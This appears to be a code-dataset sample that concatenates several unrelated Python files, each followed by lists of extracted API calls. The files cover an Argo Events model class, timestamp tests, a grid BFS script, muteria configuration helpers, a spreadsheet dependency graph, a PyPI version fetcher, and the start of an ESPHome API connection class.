"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1AWSLambdaTrigger):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1alpha1AWSLambdaTrigger):
return True
return self.to_dict() != other.to_dict()
|
[
"argo.events.client.configuration.Configuration",
"six.iteritems"
] |
[((6737, 6770), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (6750, 6770), False, 'import six\n'), ((1689, 1704), 'argo.events.client.configuration.Configuration', 'Configuration', ([], {}), '()\n', (1702, 1704), False, 'from argo.events.client.configuration import Configuration\n')]
|
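A construction sketch for the generated model above; all field values are placeholders (function_name, payload, and region are required by the setters' validation):

trigger = V1alpha1AWSLambdaTrigger(
    function_name="my-function",
    payload=[],            # list of V1alpha1TriggerParameter
    region="us-east-1",
)
print(trigger.to_dict())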
from __future__ import print_function
from builtins import str
from builtins import object
import sys, os
sys.path.append(os.path.dirname(os.getcwd()))
from moments.timestamp import *
def test_time():
s = "*2008.10.22 11:15:42 suffix remainder here"
(ts, remainder) = parse_line_for_time(s)
assert ts == "*2008.10.22 11:15:42"
t = Timestamp(tstamp=ts)
t2 = datetime(2008, 10, 22, 11, 15, 42)
assert t.datetime == t2
t = Timestamp(tstamp="*2008.10.22 11:15")
t2 = datetime(2008, 10, 22, 11, 15)
assert t.datetime == t2
class TestTimestamp(object):
def setUp(self):
self.ts = Timestamp("20110707")
def test_init(self):
#make sure it loads
ts = Timestamp("20090210")
assert ts.compact() == "20090210"
def test_dupe_init(self):
dupe_ts = Timestamp(self.ts)
print(self.ts.dt)
print(isinstance(self.ts, Timestamp))
print(dupe_ts.dt)
assert dupe_ts.dt == self.ts.dt
def test_months(self):
now = Timestamp()
assert str(now.future_month(0)) == str(now.past_month(0))
class TestTimerange(object):
def setUp(self):
tstamp = "20081218210057"
self.tr = Timerange(tstamp)
#self.now = datetime.now()
self.now = Timestamp()
def test_init(self):
(start, end) = self.tr.as_tuple()
t = datetime(2008, 12, 18, 21, 0, 57)
assert start.datetime == t
#print end.datetime
#print self.now
assert end.compact() == self.now.compact()
def test_str(self):
tstamp = "20081218"
tr = Timerange(tstamp)
print(str(tr))
#assert str(tr) == "20081218-20081219"
assert str(tr) == "20081218-20081218235959"
tstamp = "20081231"
tr = Timerange(tstamp)
#assert str(tr) == "20081231-20090101"
assert str(tr) == "20081231-20081231235959"
def test_from_trange(self):
tstamp = "20081218"
(start, end) = Timerange('').from_text(tstamp)
#bit kludgy here... probably a better way to test for types
#assert str(type(start.datetime)) == "<type 'datetime.datetime'>"
#assert str(type(end.datetime)) == "<type 'datetime.datetime'>"
assert isinstance(start.datetime, datetime)
assert isinstance(end.datetime, datetime)
class TestRelativeRange(object):
def setUp(self):
tstamp = "20081218210057"
self.tr = Timerange(tstamp)
self.timerange = Timerange('20100428-20100528')
#june 2, 2010 is a Wednesday:
tstamp = Timestamp(compact="20100602")
#print tstamp
#self.rr = RelativeRange(tstamp)
self.rr = Timerange(tstamp)
print(self.rr)
#december 1, 2010 is a Wednesday:
self.dec = Timestamp(compact='201012')
#self.rr_dec = RelativeRange(self.dec)
self.rr_dec = Timerange(self.dec)
def test_year(self):
print(str(self.rr))
print(self.rr.year())
assert str(self.rr.year()) == "2010-20101231235959"
def test_month(self):
feb = Timestamp(compact='201002')
dec_r = self.rr.month(self.dec)
feb_r = self.rr.month(feb)
assert str(dec_r) == "20101201-20101231235959"
assert str(feb_r) == "20100201-20100228235959"
nov_r = self.rr_dec.last_month()
print(nov_r)
assert str(nov_r) == "20101101-20101130235959"
this_month_r = self.rr_dec.this_month()
assert str(this_month_r) == "20101201-20101231235959"
next_month_r = self.rr_dec.next_month()
assert str(next_month_r) == "20110101-20110131235959"
def test_week(self):
week = self.rr.week()
print(week)
#dec 1, 2010 is wednesday, starting week on friday
#to test opposite direction
week = self.rr_dec.week(week_start=4)
print(week)
assert str(week) == "20101126-20101202235959"
week = self.rr.week()
assert str(week) == "20100531-20100606235959"
#assert False
def test_day(self):
day = self.rr.day()
print(day)
assert str(day) == "20100602-20100602235959"
## def test_this_week_last_year():
## now = datetime.now()
## year = timedelta(365)
## last_year = now - year
## start = last_year - timedelta(4)
## end = last_year + timedelta(4)
## stamp = start.strftime("%Y%m%d") + '-' + end.strftime("%Y%m%d")
## print this_week_last_year()
## assert stamp == this_week_last_year()
|
[
"os.getcwd",
"builtins.str"
] |
[((138, 149), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (147, 149), False, 'import sys, os\n'), ((1656, 1663), 'builtins.str', 'str', (['tr'], {}), '(tr)\n', (1659, 1663), False, 'from builtins import str\n'), ((1727, 1734), 'builtins.str', 'str', (['tr'], {}), '(tr)\n', (1730, 1734), False, 'from builtins import str\n'), ((1885, 1892), 'builtins.str', 'str', (['tr'], {}), '(tr)\n', (1888, 1892), False, 'from builtins import str\n'), ((2979, 2991), 'builtins.str', 'str', (['self.rr'], {}), '(self.rr)\n', (2982, 2991), False, 'from builtins import str\n'), ((3242, 3252), 'builtins.str', 'str', (['dec_r'], {}), '(dec_r)\n', (3245, 3252), False, 'from builtins import str\n'), ((3297, 3307), 'builtins.str', 'str', (['feb_r'], {}), '(feb_r)\n', (3300, 3307), False, 'from builtins import str\n'), ((3415, 3425), 'builtins.str', 'str', (['nov_r'], {}), '(nov_r)\n', (3418, 3425), False, 'from builtins import str\n'), ((3527, 3544), 'builtins.str', 'str', (['this_month_r'], {}), '(this_month_r)\n', (3530, 3544), False, 'from builtins import str\n'), ((3638, 3655), 'builtins.str', 'str', (['next_month_r'], {}), '(next_month_r)\n', (3641, 3655), False, 'from builtins import str\n'), ((3938, 3947), 'builtins.str', 'str', (['week'], {}), '(week)\n', (3941, 3947), False, 'from builtins import str\n'), ((4023, 4032), 'builtins.str', 'str', (['week'], {}), '(week)\n', (4026, 4032), False, 'from builtins import str\n'), ((4171, 4179), 'builtins.str', 'str', (['day'], {}), '(day)\n', (4174, 4179), False, 'from builtins import str\n')]
|
import structures
import Point
def get_adj(grid, cur, checked):
adj_list = []
# Checks down
if cur.x < len(grid[0])-1:
down = Point.Point(cur.x+1, cur.y)
if down not in checked:
adj_list.append(down)
# Checks right
if cur.y < len(grid)-1:
right = Point.Point(cur.x, cur.y+1)
if right not in checked:
adj_list.append(right)
# Checks left
# if cur.x > 0:
# left = Point.Point(cur.x-1, cur.y)
# if left not in checked:
# adj_list.append(left)
# if grid[cur.x][cur.y+1] == '0':
# adj_list.append(cur)
return adj_list
def bfs(grid, start, target):
# print(start)
# print(target)
q = structures.Queue()
checked = structures.Set()
checked.add(start)
q.push(start)
while q:
cur = q.pop()
q.push_list(get_adj(grid, cur, checked))
for pnt in q:
checked.add(pnt)
print(q)
print(cur)
grid[cur.y][cur.x] = 'X'
for line in grid:
for cell in line:
print(cell, end=' ')
print()
    return grid  # return only after the queue has been drained
if __name__ == '__main__':
grid = [
['S','0','0', '0'],
['0','0','0', '0'],
['0','0','0', '0'],
['0','0','0', '0'],
['0','0', '0','F']
]
s = Point.Point()
f = Point.Point(len(grid)-1, len(grid[0])-1)
bfs(grid, s, f)
|
[
"structures.Set",
"Point.Point",
"structures.Queue"
] |
[((636, 654), 'structures.Queue', 'structures.Queue', ([], {}), '()\n', (652, 654), False, 'import structures\n'), ((666, 682), 'structures.Set', 'structures.Set', ([], {}), '()\n', (680, 682), False, 'import structures\n'), ((1141, 1154), 'Point.Point', 'Point.Point', ([], {}), '()\n', (1152, 1154), False, 'import Point\n'), ((135, 164), 'Point.Point', 'Point.Point', (['(cur.x + 1)', 'cur.y'], {}), '(cur.x + 1, cur.y)\n', (146, 164), False, 'import Point\n'), ((271, 300), 'Point.Point', 'Point.Point', (['cur.x', '(cur.y + 1)'], {}), '(cur.x, cur.y + 1)\n', (282, 300), False, 'import Point\n')]
|
"""
Note: The raw configuration is a configuration that has the exact
same representation as in the file but loaded in memory as a dict.
(Example: module given in file still have the filename or function
given as string to be evaluated are also still string).
But the final conf has everything loaded and ready to use
"""
from __future__ import print_function
import os
import sys
import argparse
import logging
import importlib
import copy
import muteria.common.mix as common_mix
import muteria.drivers.criteria as criteria
import muteria.drivers.testgeneration as testgeneration
import muteria.drivers.optimizers.criteriatestexecution.optimizerdefs as \
crit_opt_module
from muteria.drivers.optimizers.criteriatestexecution\
.base_criteria_test_execution_optimizer \
import BaseCriteriaTestExecutionOptimizer
import muteria.configmanager.configurations as configurations
from muteria.configmanager.configurations import CompleteConfiguration
from muteria.configmanager.configurations import ConfigElement
import muteria.controller.checkpoint_tasks as checkpoint_tasks
ERROR_HANDLER = common_mix.ErrorHandler
class ConfigurationHelper(object):
@classmethod
def _get_available_default_raw_conf_by_language(cls, languages):
res = {}
for lang in languages:
res[lang] = cls._get_default_raw_conf(lang)
return res
#~ def _get_available_default_raw_conf_by_language()
@classmethod
def _get_default_raw_conf(cls, language):
config_default = "muteria.configmanager.defaults"
# Get common default conf
com_default_conf = cls._load_raw_conf_from_file(\
module_str=".".join([config_default, 'common_defaults']),\
info="common config module", \
must_exist=True)
ERROR_HANDLER.assert_true(com_default_conf is not None, \
'invalid for comm', __file__)
# Get language specific default conf
lang_default_conf = cls._load_raw_conf_from_file(\
module_str=".".join([config_default, 'languages', language]),\
info="language "+language+" config module",\
must_exist=False)
# create an object that is an update of common_default_conf by
# lang_default_conf
com_conf_dict = cls._get_object_params_vals_as_dict(com_default_conf)
if lang_default_conf is None:
lang_conf_dict = {}
else:
lang_conf_dict = \
cls._get_object_params_vals_as_dict(lang_default_conf)
## Make sure default has all parameters
c_tmp = cls._get_object_params_vals_as_dict(CompleteConfiguration)
useless = set(com_conf_dict) - set(c_tmp)
ERROR_HANDLER.assert_true(\
len(useless) + len(c_tmp) == len(com_conf_dict),\
"Some Configs params not in common default", __file__)
# get result
## remove irrelevant
for u in useless:
del com_conf_dict[u]
## update
res = cls._get_update_left_with_right_raw_conf(com_conf_dict,\
lang_conf_dict, same_key=False)
return res
#~ def _get_default_raw_conf()
@staticmethod
def _get_object_params_vals_as_dict(obj):
""" Get all fields of obj that are not hidden
"""
res = {}
for param, val in list(vars(obj).items()):
if param.startswith('_'):
continue
res[param] = val
return res
#~ def _get_object_params_vals_as_dict()
@staticmethod
def _load_raw_conf_from_file(module_str, info="module", must_exist=True):
res = None
try:
res = importlib.import_module(module_str)
except ImportError as ie:
if must_exist:
ERROR_HANDLER.error_exit("{} {} {}. \n {}.".format(\
"Failed to load", info, module_str, str(ie)), \
__file__)
except SyntaxError as se:
ERROR_HANDLER.error_exit("{} {} {}. \n {}.".format(\
"Syntax error in", info, module_str, str(se)), \
__file__)
return res
#~ def _load_raw_conf_from_file()
@classmethod
def _get_update_rawconf_with_file(cls, raw_conf, raw_conf_filename):
"""
load config from file and update raw conf with its contents
"""
path, filename = os.path.split(os.path.normpath(\
os.path.abspath(raw_conf_filename)))
if path:
sys.path.insert(0, path)
ERROR_HANDLER.assert_true(filename.endswith('.py'), "{}{}{}".format(\
"invalid conf file (", filename, \
"). must be python source file"), __file__)
mod_name = filename[:-len('.py')]
fconf = cls._load_raw_conf_from_file(mod_name, info="conf file", \
must_exist=True)
if path:
ERROR_HANDLER.assert_true(sys.path[0] == path, "BUG", __file__)
sys.path.pop(0)
if fconf is None:
fconf_dict = {}
else:
fconf_dict = cls._get_object_params_vals_as_dict(fconf)
# update
res = cls._get_update_left_with_right_raw_conf(raw_conf, fconf_dict,\
same_key=False)
return res
#~ def _get_update_rawconf_with_file()
@staticmethod
def _get_update_left_with_right_raw_conf(left, right, same_key=True):
""" Update the keys of left with the corresponding keys in right
into a new dict and return it.
"""
if same_key:
ERROR_HANDLER.assert_true(set(left) == set(right), \
"different keys", __file__)
res = dict(left)
for k, v in list(right.items()):
if k in res:
res[k] = v
return res
#~ def _get_update_left_with_right_raw_conf()
@classmethod
def _make_conf_class_from_dict(cls, dict_obj):
cc = CompleteConfiguration()
if set(dict_obj) != set(cls._get_object_params_vals_as_dict(\
CompleteConfiguration)):
in_obj_only = set(dict_obj) - \
set(cls._get_object_params_vals_as_dict(\
CompleteConfiguration))
final_templ_only = set(cls._get_object_params_vals_as_dict(\
CompleteConfiguration)) - set(dict_obj)
ERROR_HANDLER.error_exit("config missmatch: {} {}. {} {}".format(\
"in_obj_only", in_obj_only,
"final template only", final_templ_only), __file__)
for k, v in list(dict_obj.items()):
setattr(cc, k, v)
return cc
#~ def _make_conf_class_from_dict()
@staticmethod
def _make_tool_conf_from_raw(raw_dict_conf, tool_type_enum,
default_tool_type, target_tool_class):
tuc = 'tool_user_custom'
ttype = 'tooltype'
c_on = 'criteria_on'
if ttype in raw_dict_conf:
if raw_dict_conf[ttype]:
ERROR_HANDLER.assert_true(\
hasattr(tool_type_enum, raw_dict_conf[ttype]), \
"Invalid test tool type: "+raw_dict_conf[ttype], \
__file__)
raw_dict_conf[ttype] = \
getattr(tool_type_enum, raw_dict_conf[ttype])
else:
raw_dict_conf[ttype] = default_tool_type
if c_on in raw_dict_conf:
if raw_dict_conf[c_on]:
raw_dict_conf[c_on] = [getattr(criteria.TestCriteria, c) \
for c in raw_dict_conf[c_on]]
else:
raw_dict_conf[c_on] = None
if tuc in raw_dict_conf:
if raw_dict_conf[tuc]:
raw_dict_conf[tuc] = \
configurations.ToolUserCustom(**raw_dict_conf[tuc])
else:
raw_dict_conf[tuc] = None
return target_tool_class(**raw_dict_conf)
#~ def _make_tool_conf_from_raw()
@classmethod
def get_extend_file_raw_conf(cls, raw_conf_file, language):
""" Take a raw conf file that might not have all the parameters and
load, then add the missing with default value into a new
returned raw conf
"""
def_conf = cls._get_default_raw_conf(language)
res = cls._get_update_rawconf_with_file(def_conf, raw_conf_file)
return res
#~ def get_extend_file_raw_conf()
@classmethod
def get_extend_raw_conf(cls, raw_conf, language):
""" Take a raw conf that might not have all the parameters and
add the missing with default value into a new returned raw conf
"""
def_conf = cls._get_default_raw_conf(language)
res = cls._get_update_left_with_right_raw_conf(def_conf, raw_conf, \
same_key=False)
return res
#~ def get_extend_raw_conf()
@classmethod
def get_finalconf_from_rawconf(cls, raw_conf):
""" Transform a raw conf into final conf
TODO: Verify config consistency
"""
conf = cls._make_conf_class_from_dict(raw_conf)
if conf.ENABLED_CRITERIA is None:
conf.ENABLED_CRITERIA = \
copy.deepcopy(conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA)
tmp = []
for c in conf.ENABLED_CRITERIA:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion: "+c)
c = criteria.TestCriteria[c]
tmp.append(c)
conf.ENABLED_CRITERIA = tmp
tmp = []
for c in conf.CRITERIA_WITH_OUTPUT_SUMMARY:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in out sum: "+c, __file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp.append(c)
conf.CRITERIA_WITH_OUTPUT_SUMMARY = tmp
if conf.CRITERIA_SEQUENCE is None:
conf.CRITERIA_SEQUENCE = copy.deepcopy(criteria.CRITERIA_SEQUENCE)
for pos, group in enumerate(conf.CRITERIA_SEQUENCE):
tmp = set()
for c in group:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in seq: "+c, __file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp.add(c)
conf.CRITERIA_SEQUENCE[pos] = tmp
if conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM is None:
conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM = copy.deepcopy(\
criteria.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM)
tmp = []
for c in conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM:
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in outdiff: "+c, __file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp.append(c)
conf.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM = tmp
tmp = {}
for c, sel_tech in conf.CRITERIA_ELEM_SELECTIONS.items():
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in crit elem selection: "+c, \
__file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
tmp[c] = sel_tech
conf.CRITERIA_ELEM_SELECTIONS = tmp
tmp = []
for tc in conf.TESTCASE_TOOLS_CONFIGS:
if not isinstance(tc, configurations.TestcaseToolsConfig):
tc = cls._make_tool_conf_from_raw(tc, \
testgeneration.TestToolType,\
testgeneration.TEST_TOOL_TYPES_SCHEDULING[0][0],\
configurations.TestcaseToolsConfig)
tmp.append(tc)
conf.TESTCASE_TOOLS_CONFIGS = tmp
tmp = {}
for crit, cc_list in list(\
conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA.items()):
for cc in cc_list:
if not isinstance(cc, configurations.CriteriaToolsConfig):
cc = cls._make_tool_conf_from_raw(cc, \
criteria.CriteriaToolType,\
criteria.CRITERIA_TOOL_TYPES_SCHEDULING[0][0],\
configurations.CriteriaToolsConfig)
# TODO: Criteria enabled verification
if crit not in tmp:
tmp[crit] = []
tmp[crit].append(cc)
conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA = tmp
# criteria Optimizer
tmp = {}
for c, opt in conf.CRITERIA_EXECUTION_OPTIMIZERS.items():
if not isinstance(c, criteria.TestCriteria):
ERROR_HANDLER.assert_true(\
criteria.TestCriteria.has_element_named(c), \
"invalid test criterion in opt: "+c, __file__)
c = criteria.TestCriteria[c]
if c not in conf.ENABLED_CRITERIA:
continue
# use base criteria opt to give option to set one own optimizer
# in conf
if not isinstance(opt, crit_opt_module.CriteriaOptimizers) and \
not isinstance(opt, BaseCriteriaTestExecutionOptimizer):
ERROR_HANDLER.assert_true(crit_opt_module.CriteriaOptimizers.\
has_element_named(opt), \
"Invalid criterion Optimizer: "+opt)
opt = crit_opt_module.CriteriaOptimizers[opt]
ERROR_HANDLER.assert_true(\
crit_opt_module.check_is_right_optimizer(c, opt), \
"Wrong optimizer for test criterion")
tmp[c] = opt
# Make sure that all criteria have optimizers
for c in conf.ENABLED_CRITERIA:
if c not in tmp:
tmp[c] = crit_opt_module.CriteriaOptimizers.NO_OPTIMIZATION
conf.CRITERIA_EXECUTION_OPTIMIZERS = tmp
tmp = []
for ct in conf.RE_EXECUTE_FROM_CHECKPOINT_META_TASKS:
if not isinstance(ct, checkpoint_tasks.Tasks):
ERROR_HANDLER.assert_true(\
checkpoint_tasks.Tasks.has_element_named(ct), \
"invalid checkpoint task: "+ct)
ct = checkpoint_tasks.Tasks[ct]
tmp.append(ct)
conf.RE_EXECUTE_FROM_CHECKPOINT_META_TASKS = tmp
# NEXT here
#TODO: Add optimizers ....
# make configelement for each
for k in raw_conf:
setattr(conf, k, ConfigElement(val=getattr(conf, k)))
return conf
#~ def get_finalconf_of_rawconf()
#~ class ConfigurationHelper()
|
[
"sys.path.pop",
"copy.deepcopy",
"os.path.abspath",
"muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.CriteriaOptimizers.has_element_named",
"importlib.import_module",
"muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.check_is_right_optimizer",
"sys.path.insert",
"muteria.drivers.criteria.TestCriteria.has_element_named",
"muteria.controller.checkpoint_tasks.Tasks.has_element_named",
"muteria.configmanager.configurations.ToolUserCustom",
"muteria.configmanager.configurations.CompleteConfiguration"
] |
[((6524, 6547), 'muteria.configmanager.configurations.CompleteConfiguration', 'CompleteConfiguration', ([], {}), '()\n', (6545, 6547), False, 'from muteria.configmanager.configurations import CompleteConfiguration\n'), ((3969, 4004), 'importlib.import_module', 'importlib.import_module', (['module_str'], {}), '(module_str)\n', (3992, 4004), False, 'import importlib\n'), ((4925, 4949), 'sys.path.insert', 'sys.path.insert', (['(0)', 'path'], {}), '(0, path)\n', (4940, 4949), False, 'import sys\n'), ((5478, 5493), 'sys.path.pop', 'sys.path.pop', (['(0)'], {}), '(0)\n', (5490, 5493), False, 'import sys\n'), ((10117, 10171), 'copy.deepcopy', 'copy.deepcopy', (['conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA'], {}), '(conf.CRITERIA_TOOLS_CONFIGS_BY_CRITERIA)\n', (10130, 10171), False, 'import copy\n'), ((11168, 11209), 'copy.deepcopy', 'copy.deepcopy', (['criteria.CRITERIA_SEQUENCE'], {}), '(criteria.CRITERIA_SEQUENCE)\n', (11181, 11209), False, 'import copy\n'), ((11926, 11989), 'copy.deepcopy', 'copy.deepcopy', (['criteria.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM'], {}), '(criteria.CRITERIA_REQUIRING_OUTDIFF_WITH_PROGRAM)\n', (11939, 11989), False, 'import copy\n'), ((4859, 4893), 'os.path.abspath', 'os.path.abspath', (['raw_conf_filename'], {}), '(raw_conf_filename)\n', (4874, 4893), False, 'import os\n'), ((8600, 8651), 'muteria.configmanager.configurations.ToolUserCustom', 'configurations.ToolUserCustom', ([], {}), '(**raw_dict_conf[tuc])\n', (8629, 8651), True, 'import muteria.configmanager.configurations as configurations\n'), ((15435, 15483), 'muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.check_is_right_optimizer', 'crit_opt_module.check_is_right_optimizer', (['c', 'opt'], {}), '(c, opt)\n', (15475, 15483), True, 'import muteria.drivers.optimizers.criteriatestexecution.optimizerdefs as crit_opt_module\n'), ((10358, 10400), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (10397, 10400), True, 'import muteria.drivers.criteria as criteria\n'), ((10769, 10811), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (10808, 10811), True, 'import muteria.drivers.criteria as criteria\n'), ((12229, 12271), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (12268, 12271), True, 'import muteria.drivers.criteria as criteria\n'), ((12778, 12820), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (12817, 12820), True, 'import muteria.drivers.criteria as criteria\n'), ((14578, 14620), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (14617, 14620), True, 'import muteria.drivers.criteria as criteria\n'), ((15112, 15169), 'muteria.drivers.optimizers.criteriatestexecution.optimizerdefs.CriteriaOptimizers.has_element_named', 'crit_opt_module.CriteriaOptimizers.has_element_named', (['opt'], {}), '(opt)\n', (15164, 15169), True, 'import muteria.drivers.optimizers.criteriatestexecution.optimizerdefs as crit_opt_module\n'), ((16050, 16094), 'muteria.controller.checkpoint_tasks.Tasks.has_element_named', 'checkpoint_tasks.Tasks.has_element_named', (['ct'], {}), '(ct)\n', (16090, 16094), True, 'import muteria.controller.checkpoint_tasks as checkpoint_tasks\n'), ((11464, 11506), 'muteria.drivers.criteria.TestCriteria.has_element_named', 'criteria.TestCriteria.has_element_named', (['c'], {}), '(c)\n', (11503, 11506), True, 'import muteria.drivers.criteria as criteria\n')]
|
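The merge helper above only overwrites keys that already exist on the left-hand side; a small sketch of that behaviour on plain dicts (it is an internal classmethod, called here only for illustration):

left = {'A': 1, 'B': 2}
right = {'B': 20, 'C': 3}
merged = ConfigurationHelper._get_update_left_with_right_raw_conf(
    left, right, same_key=False)
print(merged)  # {'A': 1, 'B': 20} -- 'C' is dropped because it is not in left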
# Copyright (c) 2010 Resolver Systems Ltd, PythonAnywhere LLP
# See LICENSE.md
#
from threading import Lock
from .errors import report_cell_error, CycleError
class Node(object):
def __init__(self, location, children=None, parents=None):
self.location = location
self.children = children if children else set()
self.parents = parents if parents else set()
self.lock = Lock()
def __eq__(self, other):
return (
self.location == other.location and
self.children == other.children and
self.parents == other.parents
)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "<Node %d,%d children={%s} parents={%s}>" % (
self.location[0], self.location[1],
', '.join(str(i) for i in self.children),
', '.join(str(i) for i in self.parents))
def remove_from_parents(self, parent_nodes, leaf_queue):
for parent in parent_nodes:
parent.lock.acquire()
parent.children.remove(self.location)
if len(parent.children) == 0:
leaf_queue.put(parent.location)
parent.lock.release()
def build_dependency_graph(worksheet):
graph = {}
visited = set()
for loc in worksheet.keys():
try:
_generate_cell_subgraph(worksheet, graph, loc, visited, [])
except CycleError:
pass # Deal with escapees
leaves = []
for loc, deps in graph.iteritems():
if not deps.children:
leaves.append(loc)
return graph, leaves
def _generate_cell_subgraph(worksheet, graph, loc, completed, path):
if loc not in worksheet:
return
cell = worksheet[loc]
if loc in completed:
if type(cell.error) == CycleError:
raise cell.error
else:
return
if loc in path:
cycle_error = CycleError(path[path.index(loc):] + [loc])
report_cell_error(worksheet, loc, cycle_error)
completed.add(loc)
raise cycle_error
if cell.python_formula:
valid_dependencies = set()
for dep_loc in cell.dependencies:
dep_cell = worksheet[dep_loc]
try:
_generate_cell_subgraph(worksheet, graph, dep_loc, completed, path + [loc])
if dep_cell.error:
continue
if not dep_cell.python_formula:
continue
valid_dependencies.add(dep_loc)
except CycleError as cycle_error:
if not loc in completed:
report_cell_error(worksheet, loc, cycle_error)
if loc in cycle_error.path:
completed.add(loc)
raise cycle_error
_add_location_dependencies(graph, loc, valid_dependencies)
completed.add(loc)
def _add_location_dependencies(graph, location, dependencies):
if location not in graph:
graph[location] = Node(location)
graph[location].children |= dependencies
for dependency in dependencies:
if dependency not in graph:
graph[dependency] = Node(dependency)
graph[dependency].parents.add(location)
|
[
"threading.Lock"
] |
[((407, 413), 'threading.Lock', 'Lock', ([], {}), '()\n', (411, 413), False, 'from threading import Lock\n')]
|
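A small standalone sketch of the graph primitives above; plain tuples stand in for cell locations, so no worksheet is needed:

graph = {}
# record that cell (1, 1) depends on cells (1, 2) and (1, 3)
_add_location_dependencies(graph, (1, 1), {(1, 2), (1, 3)})
print(graph[(1, 1)].children)  # {(1, 2), (1, 3)}
print(graph[(1, 2)].parents)   # {(1, 1)}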
import requests
def getrev():
resp = requests.get("https://pypi.org/pypi/TwitchIO/json")
data = resp.json()["releases"]
pre = max(data).split("b")
final = f"{pre[0]}b{int(pre[1]) + 1}"
return final
print(getrev())
|
[
"requests.get"
] |
[((43, 94), 'requests.get', 'requests.get', (['"""https://pypi.org/pypi/TwitchIO/json"""'], {}), "('https://pypi.org/pypi/TwitchIO/json')\n", (55, 94), False, 'import requests\n')]
|
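One caveat with the snippet above: max() compares the release keys lexicographically, so "1.10.0" sorts before "1.9.0", and the split assumes the latest key contains a "b". A safer ordering is possible with the third-party packaging library:

from packaging.version import Version

def latest_release(releases):
    # parse each key so "1.10.0b2" correctly outranks "1.9.0b1"
    return max(releases, key=Version)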
import asyncio
import logging
import socket
import time
from dataclasses import astuple, dataclass
from typing import Any, Awaitable, Callable, List, Optional, cast
from google.protobuf import message
import aioesphomeapi.host_resolver as hr
from .api_pb2 import ( # type: ignore
ConnectRequest,
ConnectResponse,
DisconnectRequest,
DisconnectResponse,
GetTimeRequest,
GetTimeResponse,
HelloRequest,
HelloResponse,
PingRequest,
PingResponse,
)
from .core import MESSAGE_TYPE_TO_PROTO, APIConnectionError
from .model import APIVersion
from .util import bytes_to_varuint, varuint_to_bytes
_LOGGER = logging.getLogger(__name__)
@dataclass
class ConnectionParams:
eventloop: asyncio.events.AbstractEventLoop
address: str
port: int
password: Optional[str]
client_info: str
keepalive: float
zeroconf_instance: hr.ZeroconfInstanceType
class APIConnection:
def __init__(
self, params: ConnectionParams, on_stop: Callable[[], Awaitable[None]]
):
self._params = params
self.on_stop = on_stop
self._stopped = False
self._socket: Optional[socket.socket] = None
self._socket_reader: Optional[asyncio.StreamReader] = None
self._socket_writer: Optional[asyncio.StreamWriter] = None
self._write_lock = asyncio.Lock()
self._connected = False
self._authenticated = False
self._socket_connected = False
self._state_lock = asyncio.Lock()
self._api_version: Optional[APIVersion] = None
self._message_handlers: List[Callable[[message.Message], None]] = []
self.log_name = params.address
def _start_ping(self) -> None:
async def func() -> None:
while self._connected:
await asyncio.sleep(self._params.keepalive)
if not self._connected:
return
try:
await self.ping()
except APIConnectionError:
_LOGGER.info("%s: Ping Failed!", self.log_name)
await self._on_error()
return
self._params.eventloop.create_task(func())
async def _close_socket(self) -> None:
if not self._socket_connected:
return
async with self._write_lock:
if self._socket_writer is not None:
self._socket_writer.close()
self._socket_writer = None
self._socket_reader = None
if self._socket is not None:
self._socket.close()
self._socket_connected = False
self._connected = False
self._authenticated = False
_LOGGER.debug("%s: Closed socket", self.log_name)
async def stop(self, force: bool = False) -> None:
if self._stopped:
return
if self._connected and not force:
try:
await self._disconnect()
except APIConnectionError:
pass
self._stopped = True
await self._close_socket()
await self.on_stop()
async def _on_error(self) -> None:
await self.stop(force=True)
async def connect(self) -> None:
if self._stopped:
raise APIConnectionError(f"Connection is closed for {self.log_name}!")
if self._connected:
raise APIConnectionError(f"Already connected for {self.log_name}!")
try:
coro = hr.async_resolve_host(
self._params.eventloop,
self._params.address,
self._params.port,
self._params.zeroconf_instance,
)
addr = await asyncio.wait_for(coro, 30.0)
except APIConnectionError as err:
await self._on_error()
raise err
except asyncio.TimeoutError:
await self._on_error()
raise APIConnectionError(
f"Timeout while resolving IP address for {self.log_name}"
)
self._socket = socket.socket(
